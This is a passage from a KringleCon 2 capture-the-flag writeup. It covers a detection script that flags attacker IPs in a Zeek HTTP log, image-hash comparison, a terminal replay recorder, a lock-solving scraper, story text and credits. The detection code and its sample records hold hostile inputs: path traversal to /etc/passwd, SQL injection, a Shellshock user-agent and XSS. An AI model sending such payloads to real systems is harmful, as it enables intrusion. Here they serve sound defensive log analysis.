However, it's recommended to change this in the sqlite db to something custom.

With that, we are able to log in and start looking at the API documentation. To find the attackers in the Zeek log, we search the request fields for the usual injection indicators:

find-evil.sh
#!/bin/bash

#LFI
jq '.[] | select(.uri | contains("passwd"))."id.orig_h"' http.log

#XSS
jq '.[] | select(.uri | contains("<script>"))."id.orig_h"' http.log
jq '.[] | select(.host | contains("<script>"))."id.orig_h"' http.log

#SQLI
jq '.[] | select(.uri | contains("SELECT"))."id.orig_h"' http.log
jq '.[] | select(.user_agent | contains("SELECT"))."id.orig_h"' http.log
jq '.[] | select(.username | contains("1=1"))."id.orig_h"' http.log

#SHELL
jq '.[] | select(.user_agent | contains("() {"))."id.orig_h"' http.log

Run it once with every search enabled to collect the directly malicious IPs:

./find-evil.sh >> malicious_ips

Then we can comment out the searches that use “user_agent” and run it again, so we get just the IPs we want to pivot on:

./find-evil.sh >> ua_search

Hint

If your for loops are hanging, try setting IFS to a newline, since the user-agent strings contain spaces:
export IFS=$'\n'

Then we can take that list of IPs and get all of the associated user-agents.

for i in `cat ua_search`; do jq ".[] | select(.\"id.orig_h\" == $i).user_agent" http.log; done > malicious_ua
for i in `cat malicious_ua`; do jq ".[] | select(.user_agent == $i).user_agent" http.log; done | sort | uniq -c | sort -n > malicious_ua_count

Remove any user agents that have more than 5 matches (those are shared by too many hosts to be a useful pivot), then remove the count column. In vim, you can do %s/^.\{-}"/"/g.

Then we can search for those malicious user agents and get all ips associated.

for i in `cat malicious_ua_count`; do jq ".[] | select(.user_agent == $i).\"id.orig_h\"" http.log; done | sort | uniq -c > ua_pivot

Then finally, to dedup and format:

cat malicious_ips ua_pivot | sort | uniq | sed 's/"//g' | tr '\n' ','

0.216.249.31,10.122.158.57,10.155.246.29,102.143.16.184,103.235.93.133,104.179.109.113,106.132.195.153,106.93.213.219,111.81.145.191,116.116.98.205,118.196.230.170,118.26.57.38,121.7.186.163,123.127.233.97,126.102.12.53,129.121.121.48,131.186.145.73,132.45.187.177,13.39.153.254,135.203.243.43,135.32.99.116,140.60.154.239,142.128.135.10,148.146.134.52,150.45.133.97,150.50.77.238,158.171.84.209,168.66.108.62,169.242.54.5,173.37.160.150,185.19.7.133,186.28.46.179,187.152.203.243,187.178.169.123,190.245.228.38,19.235.69.221,193.228.194.36,200.75.228.240,203.68.29.5,217.132.156.225,220.132.33.81,2.230.60.70,223.149.180.133,22.34.153.164,2.240.116.254,225.191.220.138,226.102.56.13,226.240.188.154,227.110.45.126,229.133.163.235,229.229.189.246,230.246.50.221,231.179.108.238,23.49.177.78,238.143.78.114,249.237.77.152,249.34.9.16,249.90.116.138,250.22.86.40,252.122.243.212,253.182.102.55,253.65.40.39,254.140.181.172,25.80.197.172,27.88.56.114,28.169.41.122,29.0.183.220,31.116.232.143,31.254.228.4,33.132.98.193,34.129.179.28,34.155.174.167,37.216.249.50,42.103.246.130,42.103.246.250,42.127.244.30,42.16.149.112,42.191.112.181,44.164.136.41,44.74.106.131,45.239.232.245,48.66.193.176,49.161.8.58,50.154.111.0,53.160.218.44,56.5.47.137,61.110.82.125,65.153.114.120,66.116.147.181,68.115.251.76,69.221.145.150,75.73.228.192,79.198.89.109,80.244.147.207,81.14.204.154,83.0.8.119,84.147.231.129,84.185.44.166,87.195.80.126,9.206.212.33,92.213.148.0,95.166.116.45,97.220.93.190
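The same detection and pivot logic as the jq pipeline above, rewritten in Python as an added example (not code from the page): the indicator list mirrors find-evil.sh, the pivot drops any user-agent seen more than 5 times before collecting every IP that used one of the remaining ones, and the result is the union of the direct hits and the pivot. The log records are constructed samples using Zeek’s http.log field names, not lines from the real http.log; load_http_log() reads the challenge’s JSON-array file and also line-delimited Zeek JSON.

```python
"""Detection logic for the Zeek http.log (added example): flag requests on the indicators
the jq one-liners use, then pivot on rare user-agents to catch the attacker's other IPs."""
import json
from collections import Counter
from typing import Dict, Iterable, List, Set

# Same indicators as find-evil.sh: (label, field, substring). Case-sensitive, like jq's contains().
INDICATORS = [
    ("lfi", "uri", "passwd"),
    ("xss", "uri", "<script>"),
    ("xss", "host", "<script>"),
    ("sqli", "uri", "SELECT"),
    ("sqli", "user_agent", "SELECT"),
    ("sqli", "username", "1=1"),
    ("shellshock", "user_agent", "() {"),
]
UA_PIVOT_MAX_HITS = 5   # page heuristic: a UA seen more than 5 times is too common to pivot on


def load_http_log(path: str) -> List[dict]:
    """The challenge file is one JSON array; stock Zeek JSON logs are one object per line. Accept both."""
    with open(path) as f:
        text = f.read()
    if text.lstrip().startswith("["):
        return json.loads(text)
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def flag_requests(records: Iterable[dict], use_user_agent: bool = True) -> Dict[str, Set[str]]:
    """Return {ip: {labels}} for every request matching an indicator. use_user_agent=False
    reproduces the second run on the page, where the user_agent searches are commented out."""
    hits: Dict[str, Set[str]] = {}
    for rec in records:
        for label, field, needle in INDICATORS:
            if field == "user_agent" and not use_user_agent:
                continue
            if needle in str(rec.get(field, "")):
                hits.setdefault(rec["id.orig_h"], set()).add(label)
    return hits


def pivot_on_user_agent(records: List[dict], seed_ips: Set[str],
                        max_hits: int = UA_PIVOT_MAX_HITS) -> Set[str]:
    """Collect the user-agents used by seed_ips, drop any seen more than max_hits times in the
    whole log, and return every IP that used one of the remaining (rare) user-agents."""
    ua_counts = Counter(rec.get("user_agent", "") for rec in records)
    seed_uas = {rec.get("user_agent", "") for rec in records if rec["id.orig_h"] in seed_ips}
    rare_uas = {ua for ua in seed_uas if ua and ua_counts[ua] <= max_hits}
    return {rec["id.orig_h"] for rec in records if rec.get("user_agent", "") in rare_uas}


def find_bad_ips(records: List[dict]) -> Set[str]:
    """The page's full pipeline: direct indicator hits, plus the UA pivot seeded from the non-UA hits."""
    direct = set(flag_requests(records, use_user_agent=True))
    pivot_seeds = set(flag_requests(records, use_user_agent=False))
    return direct | pivot_on_user_agent(records, pivot_seeds)


# Constructed sample records (not from the real http.log), using Zeek's http.log field names.
def _rec(ip, uri="/api/weather?station=1", host="srf.elfu.org",
         ua="Mozilla/5.0 (X11; Linux x86_64) Firefox/68.0", user="-"):
    return {"id.orig_h": ip, "uri": uri, "host": host, "user_agent": ua, "username": user}


SAMPLE_LOG = [
    _rec("10.0.0.1", uri="/api/weather?station=../../../../etc/passwd",
         ua="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    _rec("10.0.0.2", uri="/login", ua="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),  # no payload, same rare UA
    _rec("10.0.0.3", uri="/api/weather?station=1' UNION SELECT 1,2,3--", ua="curl/7.64.1"),
    _rec("10.0.0.4", ua="() { :; }; /bin/bash -c 'id'"),
    _rec("10.0.0.5", host="<script>alert(1)</script>"),
    _rec("10.0.0.6", uri="/login", user="admin' OR 1=1--"),
] + [_rec(f"10.0.0.{n}") for n in range(10, 16)]   # benign traffic sharing the common Firefox UA


if __name__ == "__main__":
    print(",".join(sorted(find_bad_ips(SAMPLE_LOG))))
```

On the sample, 10.0.0.2 never sends a payload but is caught through the pivot because it shares the rare MSIE 6.0 user-agent with 10.0.0.1, while the benign Firefox hosts survive because that user-agent is too common to pivot on. Pointing find_bad_ips(load_http_log("http.log")) at the real file reproduces the page’s list.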

The Story

_images/the_end.png
Tooth Fairy

Tooth Fairy

Date: February 28, 2019

To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole

From: A Concerned and Aggrieved Character

Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!


Attention All Elf University Personnel,

It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.

For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.

If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.

Sincerely,

--A Concerned and Aggrieved Character
_images/complete.png
I hate how Santa is so beloved, but only works one day per year!
He has all of the resources of the North Pole and the elves to help him too.
I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children.
But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us!
But, although you found me, you haven’t foiled my plot!
Santa’s sleigh will NOT be able to find its way.
I will get my revenge and respect!
I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!
Santa

Santa

You did it! Thank you! You uncovered the sinister plot to destroy the holiday season!
Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays!
Ho Ho Ho!
The more I laugh, the more I fill with glee.
And the more the glee,
The more I'm a merrier me!
Merry Christmas and Happy Holidays.
Krampus

Krampus

Congratulations on a job well done!
Oh, by the way, I won the Frido Sleigh contest.
I got 31.8% of the prizes, though I'll have to figure that out.
Tooth Fairy

Tooth Fairy

You foiled my dastardly plan! I’m ruined!
And I would have gotten away with it too, if it weren't for you meddling kids!
Narrative
Whose grounds these are, I think I know
His home is in the North Pole though
He will not mind me traipsing here
To watch his students learn and grow
Some other folk might stop and sneer
"Two turtle doves, this man did rear?"
I'll find the birds, come push or shove
Objectives given: I'll soon clear
Upon discov'ring each white dove,
The subject of much campus love,
I find the challenges are more
Than one can count on woolen glove.
Ho ho, what's this? What strange boudoir!
Things here cannot be what they seem
That portal's more than clothing store.
Who enters contests by the ream
And lives in tunnels meant for steam?
This Krampus bloke seems rather strange
And yet I must now join his team...
Despite this fellow's funk and mange
My fate, I think, he's bound to change.
What is this contest all about?
His victory I shall arrange!
To arms, my friends! Do scream and shout!
Some villain targets Santa's route!
What scum - what filth would seek to end
Kris Kringle's journey while he's out?
Surprised, I am, but "shock" may tend
To overstate and condescend.
'Tis little more than plot reveal
That fairies often do extend
And yet, despite her jealous zeal,
My skills did win, my hacking heal!
No dental dealer can so keep
Our red-clad hero in ordeal!
This Christmas must now fall asleep,
But next year comes, and troubles creep.
And Jack Frost hasn't made a peep,
And Jack Frost hasn't made a peep...
LetterOfWintryMagic.pdf
Thankfully, I didn’t have to
implement my plan by myself!
Jack Frost promised to use his
wintry magic to help me subvert
Santa’s horrible reign of holiday
merriment NOW and FOREVER!

LetterOfWintryMagic.pdf

Misc

If you attempt to connect to an invalid challenge url, you see this ascii art:

https://docker2019.kringlecon.com/

Which looks like it was sourced from here: https://ascii.co.uk/art/santa

_______________________________________
< Ho Ho Ho, Invalid Challenge Selection >
 ---------------------------------------

  \           ______________
    \        /         \    \
      \     /           \    \
          / _________   \    |
          \/     _   \  /    |
           \ /    \   \/_    |
           |  O_O_/   || \_  \
          / __(_ __   ||   \ /
         /\/___\___\_/  \  /_\
        /      __        \/   \
        |                |\___/
  ______|________        |  \
 /              /\       /   \
 |              | \     /     \
 \______________\  |___/       \
  _|___            |_____\      \
 /|  __|           |_|| o \      \
| |    \           |_||____\_____/\
\_|____/     /     |        \_____/____
   |        //     |         /     \   \
   |       //      |_________\_/\   \   \__  ______
   |      /        |         /_ |_/_/      \/_//__/|
   |               |________// \|  \      //_//__/||\_
   |               |        \__//   |    / | ||__|/_  \
   |               |        |       |    \_|_/         \
   |  ___________  | |      |       /                   |
    \               \|______|      /              _____ |
     \               \      |      |      \\     _/   / |
      \               \_____|______\___    \    -/___/  |
       \                         ______\_____          /
        \                       / \          \        /
         \__________________    \ |           |______/   Tiziana
                            \    /            /
                             \__/____________/

Elves

The game ships more elf images than it actually uses. Since the files are numbered, we can enumerate them; there are 22. Two pairs look identical but the files hash differently:

Elves 9 and 19 are the same image, but with different file hashes
Elves 4 and 22 are the same image, but with different file hashes
_images/all_elves.png
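As an added example (not from the writeup and not the game's own code), here is the enumeration and comparison done in a reusable way: probe numbered assets until the first miss, then group them by raw file hash and, separately, by a hash of the decoded pixels, so that two files that differ only in metadata or compression still surface as duplicates. The fetcher, the 22-image fixture and the URL pattern /images/elf{n}.png are constructed stand-ins, and it is an assumption that the real pairs differ only in something like an extra chunk rather than in pixel content.

```python
import hashlib
import struct
import zlib
from typing import Callable, Dict, List, Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """One PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(pixels: List[List[int]], comment: Optional[bytes] = None) -> bytes:
    """Minimal 8-bit greyscale PNG (filter type 0 on every row). An optional
    tEXt chunk changes the file bytes without changing a single pixel."""
    height, width = len(pixels), len(pixels[0])
    raw = b"".join(b"\x00" + bytes(row) for row in pixels)
    out = PNG_SIG
    out += _chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0))
    if comment is not None:
        out += _chunk(b"tEXt", b"Comment\x00" + comment)
    out += _chunk(b"IDAT", zlib.compress(raw))
    out += _chunk(b"IEND", b"")
    return out


def file_digest(blob: bytes) -> str:
    """Hash of the bytes on disk: what a naive dedupe compares."""
    return hashlib.sha256(blob).hexdigest()


def pixel_digest(png: bytes) -> str:
    """Hash of the decoded pixel rows only (filter-0 PNGs such as make_png
    emits), ignoring ancillary chunks and compression choices."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        if ctype == b"IHDR":
            width, height = struct.unpack(">II", data[:8])
        elif ctype == b"IDAT":
            idat += data
        pos += 12 + length
    raw = zlib.decompress(idat)
    stride = width + 1  # one filter byte precedes each row
    if any(raw[i * stride] != 0 for i in range(height)):
        raise ValueError("only filter type 0 is supported here")
    rows = b"".join(raw[i * stride + 1:(i + 1) * stride] for i in range(height))
    return hashlib.sha256(rows).hexdigest()


def enumerate_numbered(fetch: Callable[[int], Optional[bytes]],
                       start: int = 1, limit: int = 200) -> Dict[int, bytes]:
    """Probe fetch(start), fetch(start+1), ... and stop at the first miss."""
    found: Dict[int, bytes] = {}
    for n in range(start, start + limit):
        blob = fetch(n)
        if blob is None:
            break
        found[n] = blob
    return found


def duplicate_groups(assets: Dict[int, bytes],
                     digest: Callable[[bytes], str]) -> List[List[int]]:
    """Asset numbers that share a digest, one sorted list per duplicate group."""
    groups: Dict[str, List[int]] = {}
    for n, blob in assets.items():
        groups.setdefault(digest(blob), []).append(n)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


def build_fixture() -> Dict[int, bytes]:
    """Constructed stand-in for the game's elf images: 22 files, where 19 is a
    re-export of 9 and 22 a re-export of 4 (same pixels, extra tEXt chunk)."""
    def pix(n: int) -> List[List[int]]:
        return [[(n * 7 + r * 4 + c) % 256 for c in range(4)] for r in range(4)]
    assets = {n: make_png(pix(n)) for n in range(1, 23)}
    assets[19] = make_png(pix(9), comment=b"re-exported")
    assets[22] = make_png(pix(4), comment=b"re-exported")
    return assets


FIXTURE = build_fixture()


def fake_fetch(n: int) -> Optional[bytes]:
    """Stands in for GET /images/elf{n}.png (assumed URL pattern); None = 404."""
    return FIXTURE.get(n)


def analyse(fetch: Callable[[int], Optional[bytes]] = fake_fetch) -> dict:
    assets = enumerate_numbered(fetch)
    return {"count": len(assets),
            "by_file_hash": duplicate_groups(assets, file_digest),
            "by_pixel_hash": duplicate_groups(assets, pixel_digest)}


if __name__ == "__main__":
    print(analyse())
```

Against the fixture, the file-hash pass reports no duplicates while the pixel-hash pass reports [4, 22] and [9, 19]; against a real target, swap fake_fetch for a function that does the HTTP GET and returns None on a 404.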

Lynx Dev Tools

This isn’t actually a hint, and links out to XKCD
_images/xkcd.png

Dual Core - Tis Not The Season

Flags we’re delivering
Flags we’re delivering
Flags we’re delivering

Set the scene where we begin covered crystalized with water
At Elf University, a wintery alma mater
Hailing from the North Pole with an overflowing cheer
Plus it only happens in that special time of year
A gathering of talent at the con with lots of hacks
Our mascots are missing so we got to bring em back
Solvin all the challenges embedded in the badge
For the little bit of rhythm Dual Core is on the track
(c)64 cut the mp3s for you to start this
Two turtle doves in a pear tree partridge
Might analyze the log of packets up front
But remember Jane and Michael on the scavenger hunt
Seems for every answer, we encounter further questions
And then really wonder why are there even worse intentions
The faster we figure it out, give it a shout makes these
Flags we’re delivering now, bring em around safely

Got the mascots recovered from a slightly distant place
Seems a little strange, what’s important is they’re safe
Whoever stole the turtle dove is urging us the name will be the same as the word is mud
Seems we better hurry up and learn enough to deter a further cover up
Under penalty of perjury instruct a jury, judge
Checking for the base case like beats in a recursive func
Workin up the nerve enough, keeping all the servers up
Eyes to the sky on the prize like Copernicus
Higher than the birds above Aladdin on a persian rug
Like Perseus, this is a mysterious mythology
Seems we got a lot to glean, but maybe we can solve it clean
Justice is paramount, keep em treated fairly
Payloads dropping, shells poppin to be merry
Nary a villain we’ve encountered this scary
I’m sayin remain vigilant and always be wary

Appendix

Scripts

Automatic Recordings

We scripted the recording of many of the asciinema videos, adapting an existing script from: https://arthepsy.eu/ctf/kringlecon2018/cranpi.hacks.html

Andris had already done most of the hard work; we only added the logic that starts the asciinema recorder. The script takes a JSON file of challenges and answers and records a separate cast for each.

Usage: solve.py <solution.json> (for each entry, the recorder re-invokes the script as solve.py <solution.json> <challenge_name> under asciinema)

[
  {
    "name": "linux_path",
    "url": "https://docker2019.kringlecon.com/?challenge=path&id=01d90e63-7466-4980-be49-f36e9ab4fdb7&username=csnTravis",
    "answers": [
      "ls",
      "which ls",
      "which -a ls",
      "find / -name \"ls\" 2>/dev/null",
      "locate */ls 2>/dev/null",
      "/bin/ls",
      "cat rej\u0009",
      "sleep 2",
      "/bin/ls -latr",
      "cat .elf\u0009"
    ]
  }
]
solve.py
#!/usr/bin/python3
# Drives a KringleCon terminal challenge (wetty over socket.io) by replaying a
# scripted list of answers, and records each run with asciinema.
import fcntl, shutil, sys, os, re, socketio, termios, time, tty, urllib3, json
import asciinema

urllib3.disable_warnings()
sio = socketio.Client()

@sio.on('connect')
def on_connect():
  # tell wetty our terminal size so the remote output fits the recording
  ts = shutil.get_terminal_size((80, 24))
  sio.emit('resize', {"col":ts.columns, "row":ts.lines})

@sio.on('output', namespace='/')
def on_output(data):
  # echo the remote terminal locally so asciinema captures it
  sys.stdout.write(data)
  sys.stdout.flush()

def console(answers):
  # put the local tty into raw mode while we type into the remote shell
  fd = sys.stdin.fileno()
  fdtc = termios.tcgetattr(fd)
  fdfl = fcntl.fcntl(fd, fcntl.F_GETFL)
  fcntl.fcntl(fd, fcntl.F_SETFL, fdfl & ~os.O_NONBLOCK)
  tty.setraw(sys.stdin)
  time.sleep(2)
  # after the answers: pause, send Ctrl-D to close the shell, then ESC as our
  # own end-of-session marker (handled below, never sent to the server)
  answers.append('sleep 3')
  answers.append(u'\u0004')
  answers.append(chr(27))
  try:
    for i in answers:
      i += "\n"
      if re.match('sleep', i):
        # "sleep N" entries are local pauses, not commands for the remote shell
        time.sleep(int(re.search(r'\d+', i).group(0)))
      else:
        for j in i:
          c = ord(j)
          if c == 27:
            sio.disconnect()
            break
          sio.emit('input', chr(c))
          time.sleep(.05)  # type slowly enough that the recording reads naturally
      time.sleep(1)
  finally:
    # always restore the terminal, even if the connection drops mid-run
    fcntl.fcntl(fd, fcntl.F_SETFL, fdfl)
    termios.tcsetattr(fd, termios.TCSADRAIN, fdtc)

if __name__ == '__main__':
  if len(sys.argv) < 2:
    print("Usage: solve.py <solution.json> [challenge_name]", file=sys.stderr)
    sys.exit(1)
  with open(sys.argv[1]) as solutions:
    chals = json.loads(solutions.read())

  if len(sys.argv) == 2:
    # recorder mode: re-invoke ourselves under asciinema once per challenge
    for i in chals:
      asciinema.record_asciicast(path=i['name'] + ".cast", title=i['name'],
                                 command="./" + sys.argv[0] + " "
                                  + sys.argv[1] + " " + i['name'])
      # drop the game's "#####hhc:" status lines and the trailing event
      out = []
      with open(i['name'] + ".cast") as cast:
        for l in cast:
          if re.search("#####hhc:", l) == None:
            out.append(l)
      out = out[:-1]
      with open(i['name'] + ".cast", 'w') as cast:
        cast.writelines(out)

  else:
    # player mode (spawned by the recorder): replay one challenge's answers
    for i in chals:
      if i['name'] == sys.argv[2]:
        sio.connect(i['url'], socketio_path='wetty/socket.io', transports='websocket')
        console(i['answers'])  # runs synchronously and disconnects when done
        sio.wait()
        sys.exit()

Crate Cracker 9000

This solves objective 11, Open the Sleigh Shop Door, in under two seconds.

noimgsleigh.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Crate Cracker 9000: scrape the ten lock codes for the Sleigh Shop door straight
# out of the page (console log, DOM, stylesheet, localStorage, OCR'd image) and
# POST them to /open in one request.

import re
import requests
import pytesseract
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

sslchk = False
base = 'https://sleighworkshopdoor.elfu.org'

# enable browser console logging, skip image loading, and load the page headless
d = dict(DesiredCapabilities.CHROME)  # copy: don't mutate the shared class dict
d['goog:loggingPrefs'] = { 'browser':'ALL' }
options = webdriver.ChromeOptions()
options.add_experimental_option("prefs", {"profile.managed_default_content_settings.images": 2})
options.add_argument("--headless")
options.add_argument("--window-size=1920x1080")
driver = webdriver.Chrome(desired_capabilities=d, options=options)
try:
    driver.get('http://sleighworkshopdoor.elfu.org')

    # lock 1: printed to the console with %c styling; the code is the third segment
    console_entry = driver.get_log('browser')[1]['message'].split("%c")
    key0 = console_entry[2].strip()

    # I want all the sauce to parse
    sauce = driver.page_source

    # the per-session seed is embedded in the stylesheet URL
    seed = re.search(r'/title><link rel="stylesheet" href="css/styles.css/(.{36})"><link', sauce, re.IGNORECASE).group(1)
    cr = requests.get(base + '/css/styles.css/' + seed, verify=sslchk)

    # lock 2: a <strong> inside the "libra" div
    key1 = re.search(r'<div class="libra"><strong>(.*)</strong>', sauce, re.IGNORECASE).group(1)

    # lock 3: only present as an image named after the seed, so OCR it
    r = requests.get(base + '/images/' + seed + '.png', verify=sslchk, stream=True)
    save_path = 'seed_img.png'
    with open(save_path, 'wb') as image:
        for chunk in r:
            image.write(chunk)
    key2 = pytesseract.image_to_string(Image.open(save_path)).strip()
    if '/' in key2:
        key2 = key2.replace('/', '7')
        print('Replaced "/" with "7" because OCR sucks sometimes')
        print('Fixed key: ' + key2)

    # lock 4: stored in localStorage under an emoji key
    key3 = driver.execute_script("return localStorage.getItem('🛢️🛢️🛢️');")

    # lock 5: appended to the page <title>
    key4 = re.search(r'<title>Crack the Crate(.*)</title>', sauce, re.IGNORECASE).group(1).strip()

    # lock 6: eight single-character divs in the hologram, read in a fixed permutation
    retmp = re.search(r'<div class="hologram"><div class="items">' + r'<div class=".{8}">(.)</div>' * 8, sauce, re.IGNORECASE)
    key5 = ''.join(retmp.group(n) for n in (4, 1, 5, 7, 6, 3, 8, 2))

    # lock 7: the font-family name in the inline <style>
    key6 = re.search(r"<style>.instructions { font-family: '(.{8})'", sauce, re.IGNORECASE).group(1)

    # lock 8: fixed
    key7 = 'VERONICA'

    # lock 9: the :active:after content of the five .chakra spans in the stylesheet
    key8 = ''.join(
        re.search(r"span\.chakra:nth-child\(%d\):active:after \{\n^  content: '(.{1,2})';" % n,
                  cr.text, re.MULTILINE).group(1)
        for n in range(1, 6))

    # lock 10: fixed
    key9 = 'KD29XJ37'
finally:
    driver.quit()  # don't leave a headless Chrome behind, even on a failed parse

keys = [key0, key1, key2, key3, key4, key5, key6, key7, key8, key9]

sess = requests.Session()
sess.headers['Content-Type'] = 'application/json'
sess.headers['User-Agent'] = 'Elfzilla/5.0 (X11; SantaHat; Linux x86_64; rv:70.0) Gecko/20100101 Snowman/1337'
sess.headers['Referer'] = base
sess.headers['Origin'] = base
sess.headers['Accept'] = 'application/json'

# build the body as a dict rather than by string concatenation, so a scraped code
# containing a quote can't break the JSON
payload = {"seed": seed, "codes": {str(n + 1): k for n, k in enumerate(keys)}}
openr = sess.post(base + '/open', verify=sslchk, json=payload)
print(openr.text)

Thanosify

All credit to: @ArdilloSec

https://gist.github.com/Ardillo/9eff43733c7ad90892171fbaf388c0c6

The only change from the original was to stop logging to the console.

window.setInterval(thanosify, 2000);
function thanosify() {
  // hide every other player's avatar; our own element carries the "me" class
  [].forEach.call(document.querySelectorAll('.player'), function (el) {
    if (!el.className.includes("me")) {
      el.style.visibility = 'hidden';
    }
  });
}

Credits

Writeup

csnTravis
rand0macc3ss
lepkie

KringleCon 2: Turtle Doves

Direction
Ed Skoudis
Technical Lead
Joshua Wright
Narrative / Story
Ed Skoudis
World Builder Lead
Evan Booth
Programming
Evan Booth
Ron Bowes
Chris Davis
Chris Elgee
Matt Toussain
Joshua Wright
System Builds & Administration
Tom Hessman
Daniel Pendolino
Artwork
Evan Booth
Chris Davis
Chris Elgee
Kimberly Elliott
Brian Hostetler
Annie Royal
Ed Skoudis
Challenge Development
Jim Apger
Evan Booth
Ron Bowes
James Brodsky
Gary Burgett
Andy Cooper
Chris Davis
Chris Elgee
Tim Frazier
Dave Herrald
Ryan Kovar
Marcus Laferrera
Brett Leaver
Lily Lee
Devian Ollam
Daniel Pendolino
John Stoner
Matt Toussain
David Veuve
Robert Wagner
Joshua Wright
Soundtrack
Dual Core
Ninjula
Josh Skoudis
Website Design
Tom Hessman
Conference Scheduler and Speaker Wrangler
Chris Fleener
Testing and Feedback
Ron Bowes
Chris Elgee
Tom Hessman
Brian Hostetler
Ryan Huffer
Daniel Pendolino
Lynn Schifano
Ed Skoudis
Joshua Wright
KringleCon Speakers
Ed Skoudis - Host
John Strand - Keynote
Mark Baggett
Ron Bowes
James Brodsky
Lesley Carhart
Ian Coldwater
Chris Davis
Chris Elgee
John Hammond
Dave Kennedy
Katie Knowles
Heather Mahalik
Deviant Ollam
Sn0w
Marketing
Chris Fleener
Sponsored Hosting Services
Google
Special Thanks
The SANS Institute

About CyberSN

CyberSN, founded in 2014, specializes in permanent and contract staffing for cybersecurity, information security and security sales professionals. With a national and international reach, CyberSN dramatically decreases the frustration, time and cost associated with job searching and hiring for cybersecurity professionals. Our proprietary cybersecurity common language technology platform, utilized by our cyber staffing directors and our cyber staffing partners, ensures CyberSN is able to rapidly connect qualified cybersecurity professionals and employers. This proprietary technology platform uses cybersecurity common language to create job descriptions and understands the job seeker’s actual experience. In short, CyberSN makes job searching and hiring simpler while creating higher retention rates. We offer engaged, contingency and retained placement services.

For more information, visit https://www.CyberSN.com

_images/cybersn.com